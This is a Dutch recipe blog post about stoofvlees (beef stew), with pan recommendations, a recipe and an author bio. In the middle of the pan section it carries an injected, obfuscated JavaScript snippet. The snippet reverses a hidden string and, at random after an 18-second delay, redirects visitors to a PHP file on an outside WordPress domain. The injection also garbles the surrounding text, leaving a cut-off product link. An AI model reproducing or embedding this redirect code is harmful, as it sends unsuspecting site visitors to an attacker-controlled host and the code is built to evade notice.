Stoofvlees; een echt winterse maaltijd!

Vroeger aten we stoofvlees vaak bij oma op zondag. Je hoorde dan dat het vlees uren stond te pruttelen en dat heeft mij altijd doen denken dat het heel moeilijk is om te maken. Niets is minder waar, eigenlijk is het heel makkelijk om te maken. Je hebt alleen een beetje geduld nodig, maar dit wordt meer dan goed beloont.

Hoe maak je stoofvlees?

Als ik stoofvlees maak, dan maak ik vaak een paar kilo tegelijk. Als je dan toch bezig bent, dan is het net zo makkelijk om wat meer te maken. De eerste avond eten we het eigenlijk altijd met verse frietjes. De tweede avond vaak met rijst of aardappelen. Daarna blijft er nog een grote portie over om in te vriezen. Altijd fijn om zoiets heerlijks achter de hand te hebben voor als er onverwachts bezoek is of voor de ultieme luie zondag.

Gietijzeren Pan

Als je stoofvlees gaat maken is het erg fijn als je een goede pan hebt. Ook al heb ik de eerste keren dat ik stoofvlees maakte ook gewoon een normale huis, tuin en keuken pan gebruikt. Het fijne van een goede pan is dat je deze vaak ook in de oven kunt zetten. Zo kun je het stoofvlees de hele nacht in de oven laten staan om rustig te sudderen.

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do.nl/le-creuset-ovale-braadpan-27cm-chiffon-pink.html”]

Le Creuset Pink, € 229,-

Dit is natuurlijk de ultieme stoofpan voor vrouwen. Alleen van de pan krijg je al zin om te koken!

Stoofvlees Pan Berghoff

Berghoff Gietijzeren Pan, € 129,90

Dit is geen echte Le Creuset, maar een fantastische stoofpan. Zelf heb ik deze ook. De pan is zwaar en staat zelfs als ik hem niet gebruik op het gasfornuis. Tip: check ING rentepunten.

Stoofvlees Pan IKEA

IKEA Senior Braad Pan, € 49,95

Je kunt natuurlijk ook voor deze IKEA pan kiezen. Werkelijk waar een goede investering waar je lang plezier van hebt.

Recept

Voorbereiding: 45 min.
Bereidingstijd: heel lang... :)

Ingredients

 • 2 kg magere riblappen of sucadelappen
 • Rasp van een sinaasappel
 • 1 stengel bleekselderij
 • 1 winterpeen
 • 1 prei
 • 1 et tomatenpuree
 • 2 laurierblaadjes
 • 3 takjes verse rozemarijn
 • 1 bakje magere spekblokjes
 • Half bolletje knoflook
 • 0,5 L fles rode wijn
 • 0,5 L runderbouillon

Aan de slag!

 1. Bak de spekblokjes aan in de pan.
 2. Snijd het vlees in stukken van ongeveer 5x5 cm en bak het kort aan in de pan met spekjes. Het lekkerste is als je het vlees gelijk aanbakt in de stoofpan, dan blijven alle smaken behouden.
 3. Snijd alle groenten in stukken. Dit hoeft niet netjes, de groenten zullen met het vlees mee sudderen. Voeg de groenten toe in de pan met vlees en bak deze kort mee.
 4. Voeg vervolgens de knoflook, laurier en rozemarijn toe.
 5. Als laatste voeg je de rode wijn en de bouillon toe in de pan.
 6. Laat het stoofvlees gedurende 3 uur sudderen (of langer als je de temperatuur lager zet). Blijf vooral proeven en wees niet bang om het vlees wat langer op het vuur te laten staan. Zelf zet ik het vlees soms ook 's nacht in de oven op een lage temperatuur van 130 graden. Je kunt het vlees rustig een uur of 8 op deze temperatuur laten staan. De eerste keren dat ik stoofvlees maakte was ik nog driftig op zoek naar recepten om te kijken hoe lang het stoofvlees moest sudderen, maar geloof me dit hoef je allemaal niet zo nauw te nemen. Twijfel je of het vlees klaar is? Dit merk je snel genoeg, het vlees gaat vanzelf uit elkaar vallen. Blijf vooral af en toe proeven en voeg naar smaak peper, zout, wijn of bouillon toe.

Variatie Tip

Bereid het stoofvlees met zwaar Belgisch bier in plaats van rode wijn!

Review

 • Cijfer 10.0

User Rating

0 (0 Votes)

Summary

Score

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Stoofvlees; een echt winterse maaltijd!"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.